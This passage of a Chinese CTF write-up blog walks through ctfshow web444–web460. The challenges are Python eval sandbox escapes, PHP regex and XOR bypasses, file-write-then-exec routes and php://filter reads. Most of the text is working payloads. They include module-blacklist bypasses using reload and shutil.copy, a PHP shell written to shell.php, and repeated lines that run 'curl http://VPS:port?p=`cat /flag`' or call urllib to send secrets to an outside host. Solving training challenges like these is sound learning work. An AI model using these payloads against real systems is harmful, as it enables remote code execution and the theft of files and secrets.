class="built_in">eval</span>(code)</span><br><span class="line">    <span class="keyword">return</span> <span class="string">&#x27;where is flag?&lt;!-- /?code --&gt;&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__==<span class="string">&quot;__main__&quot;</span>:</span><br><span class="line">    app.run(host=<span class="string">&#x27;0.0.0.0&#x27;</span>,port=<span class="number">80</span>)</span><br></pre></td></tr></table></figure>

<p>这题把len过滤了，可以继续用上题的方法</p>
<p>POST传入</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">code=str(exec(globals()[list(globals().keys())[True-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)]].args.get(globals()[list(globals().keys())[True-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)]].method)))</span><br></pre></td></tr></table></figure>

<p>GET传入</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?POST=import os;os.system(&#x27;curl http://你的vps地址:端口?p=`cat /flag`&#x27;)</span><br></pre></td></tr></table></figure>

<h3 id="web445"><a href="#web445" class="headerlink" title="web445"></a>web445</h3><p>这题代码总体跟上题差不多，不过开头那里把<code>os.system</code>和<code>os.popen</code>去掉了</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250826182431328.png"></p>
<p>那直接调用肯定是不行的了，可以<strong>用reload函数重新加载os模块</strong>，然后再重新调用system函数</p>
<p>简单介绍一下<code>reload</code>，<code>reload</code> 是 Python 中用于<strong>重新加载已导入模块</strong>的函数。</p>
<p><strong>作用</strong></p>
<ul>
<li>Python 的模块在导入时会被缓存，后续再次导入同一模块时不会重新执行模块代码，而是直接使用缓存</li>
<li><code>reload</code> 函数可以让已经导入的模块重新执行代码，更新模块内容（相当于“刷新”模块），适合在开发或调试时修改代码后即时生效，而不需要重启程序</li>
</ul>
<p><strong>使用方法</strong></p>
<ul>
<li>Python 2 中 <code>reload()</code> 是内置函数，可以直接调用</li>
<li>Python 3 中，<code>reload()</code> 被移到 <code>importlib</code> 模块中，需要先导入使用</li>
</ul>
<p>我们POST传入</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">code=str(exec(globals()[list(globals().keys())[True-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)]].args.get(globals()[list(globals().keys())[True-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)]].method)))</span><br></pre></td></tr></table></figure>

<p>GET传入</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?POST=from importlib import reload;reload(os);os.system(&#x27;curl http://你的vps地址:端口?p=`cat /flag`&#x27;)</span><br></pre></td></tr></table></figure>

<p>成功得到flag</p>
<h3 id="web446"><a href="#web446" class="headerlink" title="web446"></a>web446</h3><p>这题相比上题把<code>imp.reload</code>函数去掉了</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250826184341423.png"></p>
<p><code>imp</code> 是 Python 早期用于动态加载模块的内置模块，在 Python 3.4 之后，<code>imp</code> 模块已被废弃，不再推荐使用，而是被更强大的 <code>importlib</code> 模块所取代</p>
<p>所以这题可以继续使用上题的方法</p>
<p>POST传入</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">code=str(exec(globals()[list(globals().keys())[True-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)]].args.get(globals()[list(globals().keys())[True-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)]].method)))</span><br></pre></td></tr></table></figure>

<p>GET传入</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?POST=from importlib import reload;reload(os);os.system(&#x27;curl http://你的vps地址:端口?p=`cat /flag`&#x27;)</span><br></pre></td></tr></table></figure>

<h3 id="web447"><a href="#web447" class="headerlink" title="web447"></a>web447</h3><p>对比一下代码</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250826190210524.png"></p>
<p>这题过滤了挺多东西，例如用于创建和管理子进程的<code>subprocess</code>模块和用于测量一小段代码执行时间的<code>timeit</code>模块，但是不影响我们用之前的方法</p>
<p>POST传入</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">code=str(exec(globals()[list(globals().keys())[True-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)]].args.get(globals()[list(globals().keys())[True-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)]].method)))</span><br></pre></td></tr></table></figure>

<p>GET传入</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?POST=from importlib import reload;reload(os);os.system(&#x27;curl http://你的vps地址:端口?p=`cat /flag`&#x27;)</span><br></pre></td></tr></table></figure>

<h3 id="web448"><a href="#web448" class="headerlink" title="web448"></a>web448</h3><p>对比一下代码</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250826223039408.png"></p>
<p>这题把好多模块都设置为None，<code>sys.modules</code> 是一个字典，<strong>记录了所有已加载的模块</strong>。键为模块名，值为模块对象</p>
<p>将 sys.modules[‘模块名’] 设为 None，可以让 Python 认为该模块已被加载，但实际值为 None。这会导致后续 import 该模块时，不再真正加载，而是返回 None（或者报错）</p>
<p>这时我们就不能用reload了，因为 Python 会在 <code>sys.modules</code> 里查找，发现值为 None，而不是模块对象，于是 import 或 reload 过程中会抛出 ModuleNotFoundError 异常</p>
<p>我们可以用<code>shutil</code>模块的copy函数把<code>os.py</code>复制到一个新文件下，然后重新导入新模块即可</p>
<p>POST传入</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">code=str(exec(globals()[list(globals().keys())[True-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)]].args.get(globals()[list(globals().keys())[True-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)]].method)))</span><br></pre></td></tr></table></figure>

<p>GET传入</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?POST=import shutil;shutil.copy(&#x27;/usr/local/lib/python3.8/os.py&#x27;,&#x27;a.py&#x27;);import a;a.system(&#x27;curl http://你的vps地址:端口?p=`cat /flag`&#x27;)</span><br></pre></td></tr></table></figure>

<h3 id="web449"><a href="#web449" class="headerlink" title="web449"></a>web449</h3><p>这题把<code>sys</code>模块和<code>importlib</code>模块都禁用了，而且还删除了<code>sys</code>模块。之前的方法用不了</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250827110015032.png"></p>
<p>我们可以用<code>urllib</code>模块来发送网络请求，带出flag。urllib 是 Python 的一个标准库模块，用于<strong>处理和操作网页 URL</strong>，以及通过网络请求获取网页内容等功能。</p>
<p><strong>主要功能</strong></p>
<ul>
<li><strong>urllib.request</strong>：用于打开和读取 URL，发送 HTTP&#x2F;HTTPS 请求，并获取响应内容</li>
<li><strong>urllib.error</strong>：包含 urllib.request 相关的异常处理，如请求失败时的错误</li>
<li><strong>urllib.parse</strong>：用于解析 URL，包括分解和构造 URL 的各个部分</li>
<li><strong>urllib.robotparser</strong>：解析和处理网站的 robots.txt 文件，判断哪些网页允许爬取</li>
</ul>
<p>POST传入</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">code=str(exec(globals()[list(globals().keys())[True-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)]].args.get(globals()[list(globals().keys())[True-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)]].method)))</span><br></pre></td></tr></table></figure>

<p>GET传入</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?POST=a=open(&#x27;/flag&#x27;).read();from urllib.request import urlopen;urlopen(&#x27;http://你的vps地址:端口?p=&#x27;%2Ba)</span><br></pre></td></tr></table></figure>

<p><code>%2B</code>表示加号，如果直接写加号会无法解析，需要先URL编码</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250827110432723.png"></p>
<h3 id="web450"><a href="#web450" class="headerlink" title="web450"></a>web450</h3><p><img src="https://oss.waynejoons.icu/picphoto/20250827110751638.png"></p>
<p>题目说执行<code>phpinfo</code>就可以拿到flag，看代码可知我们只要满足这个正则匹配即可执行代码，我们简单分析一下</p>
<ul>
<li><code>^</code> 和 <code>$</code> 是锚点，表示匹配字符串的开始和结束</li>
<li><code>[a-z]+</code> 表示匹配一个或多个小写英文字母</li>
<li><code>[\^]</code> 表示匹配一个脱义的插入符号 <code>^</code></li>
</ul>
<p>举个例子，也就是<code>abc^def^ghi</code>，满足正则匹配只要在中间加两个<code>^</code>即可。两个相同的字符异或，得到0，0和另一个字符异或，得到的便是另一个字符</p>
<p>payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?ctfshow=phpinfo^phpinfo^phpinfo</span><br></pre></td></tr></table></figure>

<p>然后搜索flag</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250827111327535.png"></p>
<h3 id="web451"><a href="#web451" class="headerlink" title="web451"></a>web451</h3><p><img src="https://oss.waynejoons.icu/picphoto/20250827113630839.png"></p>
<p>这题把<code>phpinfo</code>过滤了。前面提到，两个相同的字符异或，得到0，0和另一个字符异或，得到另一个字符，所以我们两两修改一下就好</p>
<p>payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?ctfshow=aaabbbb^phpbbbb^aaainfo</span><br></pre></td></tr></table></figure>

<h3 id="web452"><a href="#web452" class="headerlink" title="web452"></a>web452</h3><p><img src="https://oss.waynejoons.icu/picphoto/20250827115632362.png"></p>
<p>这题过滤了挺多东西，但操作空间依然很大，直接执行代码就可以</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?ctfshow=echo `ls /`;</span><br></pre></td></tr></table></figure>

<p><img src="https://oss.waynejoons.icu/picphoto/20250827120030617.png"></p>
<p>然后读取<code>flaag</code></p>
<p>payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?ctfshow=echo `cat /flaag`;</span><br></pre></td></tr></table></figure>

<p>后面在网上看了其他方法，可以用括号包住进行字符串拼接</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">(php.info)();</span><br></pre></td></tr></table></figure>

<h3 id="web453"><a href="#web453" class="headerlink" title="web453"></a>web453</h3><p>打开网站查看源代码，可以看到提示</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250827125927307.png"></p>
<p>我们GET传入</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/ctf/show?s=XXX</span><br></pre></td></tr></table></figure>

<p>POST传入</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">s=index.php</span><br></pre></td></tr></table></figure>

<p>然后查看网页源码，可以看到<code>index.php</code>代码，下面展示部分代码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">ctf</span></span>&#123;</span><br><span class="line">	<span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">show</span>(<span class="params"><span class="variable">$request</span>,<span class="variable">$response</span></span>)</span>&#123;</span><br><span class="line">		 <span class="variable">$response</span>-&gt;<span class="title function_ invoke__">header</span>(<span class="string">&#x27;Content-Type&#x27;</span>, <span class="string">&#x27;text/html; charset=utf-8&#x27;</span>);</span><br><span class="line">		 <span class="variable">$s</span>=<span class="variable">$request</span>-&gt;post[<span class="string">&#x27;s&#x27;</span>];</span><br><span class="line">		 <span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$s</span>))&#123;</span><br><span class="line">		 	<span class="variable">$response</span>-&gt;<span class="title function_ invoke__">end</span>(<span class="title function_ invoke__">file_get_contents</span>(<span class="variable">$s</span>));</span><br><span class="line">		 &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">		 	<span class="variable">$response</span>-&gt;<span class="title function_ invoke__">end</span>(<span class="string">&#x27;s not found&#x27;</span>);</span><br><span class="line">		 &#125;</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">file</span>(<span class="params"><span class="variable">$request</span>,<span class="variable">$response</span></span>)</span>&#123;</span><br><span class="line"> 		 <span class="variable">$response</span>-&gt;<span class="title function_ invoke__">header</span>(<span class="string">&#x27;Content-Type&#x27;</span>, <span class="string">&#x27;text/html; charset=utf-8&#x27;</span>);</span><br><span class="line">		 <span class="variable">$s</span>=<span class="variable">$request</span>-&gt;post[<span class="string">&#x27;s&#x27;</span>];</span><br><span class="line">		 <span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$s</span>))&#123;</span><br><span class="line">		 	<span class="title function_ invoke__">file_put_contents</span>(<span class="string">&#x27;shell.php&#x27;</span>, <span class="variable">$s</span>);</span><br><span class="line">		 	<span class="variable">$response</span>-&gt;<span class="title function_ invoke__">end</span>(<span class="string">&#x27;file write done in /var/www/shell.php&#x27;</span>);</span><br><span class="line">		 &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">		 	<span class="variable">$response</span>-&gt;<span class="title function_ invoke__">end</span>(<span class="string">&#x27;s not found&#x27;</span>);</span><br><span class="line">		 &#125;</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">exec</span>(<span class="params"><span class="variable">$request</span>,<span class="variable">$response</span></span>)</span>&#123;</span><br><span class="line">		<span class="title function_ invoke__">system</span>(<span class="string">&#x27;php shell.php&#x27;</span>);</span><br><span class="line">		<span class="variable">$response</span>-&gt;<span class="title function_ invoke__">end</span>(<span class="string">&#x27;command exec done&#x27;</span>);</span><br><span class="line">	&#125;</span><br></pre></td></tr></table></figure>

<p>也就是我们访问路径<code>/ctf/file</code>，然后POST传入内容，就会被写进<code>shell.php</code>。接着再访问路径<code>/ctf/exec</code>就可以执行<code>shell.php</code>的代码</p>
<p>同样的，我们用curl外带执行系统命令即可</p>
<p>首先GET传入</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/ctf/file</span><br></pre></td></tr></table></figure>

<p>POST传入</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">s=&lt;?php system(&#x27;curl http://你的vps地址:端口?p=`cat f*`&#x27;);?&gt;</span><br></pre></td></tr></table></figure>

<p>然后访问路径<code>/ctf/exec</code>，最后在服务器查看结果即可</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250827131321033.png"></p>
<h3 id="web454"><a href="#web454" class="headerlink" title="web454"></a>web454</h3><p>跟上题一样，我们先查看源码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">ctf</span></span>&#123;</span><br><span class="line">	<span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">show</span>(<span class="params"><span class="variable">$request</span>,<span class="variable">$response</span></span>)</span>&#123;</span><br><span class="line">		 <span class="variable">$response</span>-&gt;<span class="title function_ invoke__">header</span>(<span class="string">&#x27;Content-Type&#x27;</span>, <span class="string">&#x27;text/html; charset=utf-8&#x27;</span>);</span><br><span class="line">		 <span class="variable">$s</span>=<span class="variable">$request</span>-&gt;post[<span class="string">&#x27;s&#x27;</span>];</span><br><span class="line">		 <span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$s</span>))&#123;</span><br><span class="line">		 	<span class="variable">$response</span>-&gt;<span class="title function_ invoke__">end</span>(<span class="title function_ invoke__">file_get_contents</span>(<span class="variable">$s</span>));</span><br><span class="line">		 &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">		 	<span class="variable">$response</span>-&gt;<span class="title function_ invoke__">end</span>(<span class="string">&#x27;s not found&#x27;</span>);</span><br><span class="line">		 &#125;</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">file</span>(<span class="params"><span class="variable">$request</span>,<span class="variable">$response</span></span>)</span>&#123;</span><br><span class="line"> 		 <span class="variable">$response</span>-&gt;<span class="title function_ invoke__">header</span>(<span class="string">&#x27;Content-Type&#x27;</span>, <span class="string">&#x27;text/html; charset=utf-8&#x27;</span>);</span><br><span class="line">		 <span class="variable">$s</span>=<span class="variable">$request</span>-&gt;post[<span class="string">&#x27;s&#x27;</span>];</span><br><span class="line">		 <span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$s</span>))&#123;</span><br><span class="line">		 	<span class="title function_ invoke__">file_put_contents</span>(<span class="string">&#x27;shell.php&#x27;</span>, <span class="variable">$s</span>);</span><br><span class="line">		 	<span class="variable">$response</span>-&gt;<span class="title function_ invoke__">end</span>(<span class="string">&#x27;file write done in /var/www/shell.php&#x27;</span>);</span><br><span class="line">		 &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">		 	<span class="variable">$response</span>-&gt;<span class="title function_ invoke__">end</span>(<span class="string">&#x27;s not found&#x27;</span>);</span><br><span class="line">		 &#125;</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">include</span>(<span class="params"><span class="variable">$request</span>,<span class="variable">$response</span></span>)</span>&#123;</span><br><span class="line">		<span class="keyword">include</span>(<span class="string">&#x27;shell.php&#x27;</span>);</span><br><span class="line">		<span class="variable">$response</span>-&gt;<span class="title function_ invoke__">end</span>(<span class="string">&#x27;include done&#x27;</span>);</span><br><span class="line">	&#125;</span><br></pre></td></tr></table></figure>

<p>这题把<code>system</code>换成<code>include</code>了，方法跟之前一样，只是最后的路径要改一下</p>
<p>GET传入</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/ctf/file</span><br></pre></td></tr></table></figure>

<p>POST传入</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">s=&lt;?php system(&#x27;curl http://你的vps地址:端口?p=`cat f*`&#x27;);?&gt;</span><br></pre></td></tr></table></figure>

<p>然后访问路径<code>/ctf/include</code>，最后在服务器查看结果即可</p>
<h3 id="web455"><a href="#web455" class="headerlink" title="web455"></a>web455</h3><p>查看源码，这题比上题多了个<code>reload</code>函数，但是用处不大。同时<code>include</code>函数也改回<code>exec</code>函数了，可以用回web453的方法</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">reload</span>(<span class="params"><span class="variable">$request</span>,<span class="variable">$response</span></span>)</span>&#123;</span><br><span class="line">		<span class="keyword">global</span> <span class="variable">$http</span>;</span><br><span class="line">		<span class="variable">$http</span>-&gt;<span class="title function_ invoke__">reload</span>();</span><br><span class="line">		<span class="variable">$response</span>-&gt;<span class="title function_ invoke__">end</span>(<span class="string">&#x27;reload done&#x27;</span>);</span><br><span class="line">	&#125;</span><br></pre></td></tr></table></figure>

<p>GET传入</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/ctf/file</span><br></pre></td></tr></table></figure>

<p>POST传入</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">s=&lt;?php system(&#x27;curl http://你的vps地址:端口?p=`cat f*`&#x27;);?&gt;</span><br></pre></td></tr></table></figure>

<p>然后访问路径<code>/ctf/exec</code>，最后在服务器查看结果</p>
<h3 id="web456"><a href="#web456" class="headerlink" title="web456"></a>web456</h3><p>除去<code>reload</code>函数，这题源码相比web453没怎么变，就只是改了end信息，因此可以继续用之前的方法</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250827133933917.png"></p>
<p>GET传入</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/ctf/file</span><br></pre></td></tr></table></figure>

<p>POST传入</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">s=&lt;?php system(&#x27;curl http://你的vps地址:端口?p=`cat f*`&#x27;);?&gt;</span><br></pre></td></tr></table></figure>

<p>然后访问路径<code>/ctf/exec</code>，最后在服务器查看结果</p>
<h3 id="web457"><a href="#web457" class="headerlink" title="web457"></a>web457</h3><p>我们看看admin类</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">admin</span> <span class="keyword">extends</span> <span class="title">user</span></span>&#123;</span><br><span class="line">    <span class="keyword">public</span>  <span class="function"><span class="keyword">function</span> <span class="title">check</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">        <span class="variable">$u</span>= <span class="title function_ invoke__">call_user_func</span>(<span class="variable">$this</span>-&gt;password);</span><br><span class="line">        <span class="keyword">return</span> <span class="variable">$u</span>==<span class="string">&#x27;admin&#x27;</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>简单分析一下</p>
<ul>
<li><code>check()</code> 中调用了 <code>call_user_func($this-&gt;password)</code>：<ul>
<li><code>call_user_func</code> 用于调用回调函数，参数可以是函数名字符串或可调用变量</li>
<li>这里 <code>$this-&gt;password</code> 被当成函数名调用，函数执行的结果赋给 <code>$u</code></li>
</ul>
</li>
<li>最后判断 <code>$u</code> 是否等于 <code>&#39;admin&#39;</code>，相等则返回 <code>true</code>，否则返回 <code>false</code></li>
</ul>
<p>因此我们传入<code>p=phpinfo</code>触发函数使其返回值为True即可，然后传入<code>u=admin</code></p>
<p>payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?u=admin&amp;p=phpinfo</span><br></pre></td></tr></table></figure>

<p><img src="https://oss.waynejoons.icu/picphoto/20250827135630855.png"></p>
<h3 id="web458"><a href="#web458" class="headerlink" title="web458"></a>web458</h3><p>这题改为<code>$u===&#39;admin&#39;</code>，变成强比较了</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">admin</span> <span class="keyword">extends</span> <span class="title">user</span></span>&#123;</span><br><span class="line">    <span class="keyword">public</span>  <span class="function"><span class="keyword">function</span> <span class="title">check</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">        <span class="variable">$u</span>= <span class="title function_ invoke__">call_user_func</span>(<span class="variable">$this</span>-&gt;password);</span><br><span class="line">        <span class="keyword">return</span> <span class="variable">$u</span>===<span class="string">&#x27;admin&#x27;</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>因为类名为admin，我们可以给p传入<code>get_class</code>获取类名，然后再传入<code>u=admin</code>，就满足条件了</p>
<p>payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?u=admin&amp;p=get_class</span><br></pre></td></tr></table></figure>

<h3 id="web459"><a href="#web459" class="headerlink" title="web459"></a>web459</h3><p><img src="https://oss.waynejoons.icu/picphoto/20250827141646415.png"></p>
<p>这题用了copy函数，PHP 中的<code>copy()</code>函数是用于<strong>复制文件</strong>的内置函数</p>
<p><strong>语法</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">bool copy ( string $source , string $dest [, resource $context ] )</span><br></pre></td></tr></table></figure>

<ul>
<li><code>$source</code>：必需，要复制的源文件路径</li>
<li><code>$dest</code>：必需，目标文件路径（包含文件名）</li>
<li><code>$context</code>：可选的上下文资源</li>
</ul>
<p>我们用php伪协议即可</p>
<p>payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?u=php://filter/read=convert.base64-encode/resource=flag.php&amp;p=1</span><br></pre></td></tr></table></figure>

<p>然后访问路径<code>/1.php</code>读取flag的base64编码，解码即可</p>
<h3 id="web460"><a href="#web460" class="headerlink" title="web460"></a>web460</h3><p>这题跟web449相比，多了一些时间检测的代码，我们看看关键部分</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250827151120464.png"></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">@<span class="title function_ invoke__">func_set_timeout</span>(<span class="number">0.7</span>)</span><br><span class="line">def <span class="title function_ invoke__">run</span>(s):</span><br><span class="line">    time.<span class="title function_ invoke__">sleep</span>(randmon.<span class="title function_ invoke__">random</span>())</span><br><span class="line">    <span class="keyword">return</span> <span class="keyword">eval</span>(s)</span><br></pre></td></tr></table></figure>

<p><img src="https://oss.waynejoons.icu/picphoto/20250827151207910.png"></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">try</span>:</span><br><span class="line">	s=<span class="title function_ invoke__">run</span>(code)</span><br><span class="line">	<span class="keyword">return</span> s</span><br><span class="line">except func_timeout.exceptions.FunctionTimedOut:</span><br><span class="line">	<span class="keyword">return</span> <span class="title function_ invoke__">exec</span>(<span class="string">&#x27;1&#x27;</span>)</span><br></pre></td></tr></table></figure>

<p>有两个区别</p>
<p><strong>1. 执行超时机制</strong></p>
<p>使用了 <code>func-timeout</code> 库，为 <code>run</code> 函数设置了 <strong>0.7 秒的超时限制</strong>。这意味着如果传入的 <code>code</code> 执行时间超过 0.7 秒，程序会抛出 <code>FunctionTimedOut</code> 异常，从而中断执行</p>
<p><strong>2. 随机延迟</strong></p>
<p>在 <code>run</code> 函数中，执行 <code>eval</code> 之前有一个 <code>time.sleep(random.random())</code>。这会增加一个 0 到 1 秒之间的随机延迟</p>
<p>算上随机延迟，也就是我们传入的代码必须要执行时间小于0.7s</p>
<p>这题有些难，参考网上Y4tacker师傅的做法，可以配合<code>urllib</code>外带数据</p>
<p>payload：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">getNumber3</span>(<span class="params">number</span>):</span><br><span class="line">    number = <span class="built_in">int</span>(number)</span><br><span class="line">    <span 